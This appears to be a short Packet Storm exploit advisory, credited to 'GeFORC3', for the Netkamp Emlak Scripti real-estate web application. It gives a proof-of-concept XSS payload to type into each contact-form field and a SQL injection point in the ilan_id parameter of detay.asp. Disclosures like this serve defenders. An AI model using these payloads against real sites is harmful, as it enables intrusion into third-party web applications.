Netkamp Emlak Scripti is susceptible to a SQL injection vulnerability.
89b14bb41b6db98788e40f03d8fc3047cb99245f794eb3fa30c9bc6b2b7db1bfNetkamp Emlak Scripti XSS & Sql Ýnjections Vulnerability
#Software: Netkamp Emlak Scripti
#download: not free(350 YTL) sale: http://www.netkamp.com/net_emlak.asp
#demo: http://netemlak.netkamp.com/
#Found By: GeFORC3 ( G3 )
#Exploit & example :
-----------------------------------------------------------------------
#XSS:
http://www.site.com/script_path/iletisim.asp
write to xss code in script's tex box
expample:
Ýletiþim Formu(contact form)
Adýnýz: "><script>alert("G3");</script>
Soyadýnýz: "><script>alert("G3");</script>
E-Mail: "><script>alert("G3");</script>
Konu: "><script>alert("G3");</script>
Mesajýnýz: "><script>alert("G3");</script>
Press to "gönder"(send) button.
This xss works on "Netkamp Emlak Scripti" script's contact page
-----------------------------------------------------------------------
#Sql Ýnjections
http://www.site.com.com/script_path/detay.asp?ilan_id=[SQL]
-----------------------------------------------------
WwW.GeFORC3.ORG | WwW.HeykirBlog.Org | WwW.NetKaBus.CoM
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed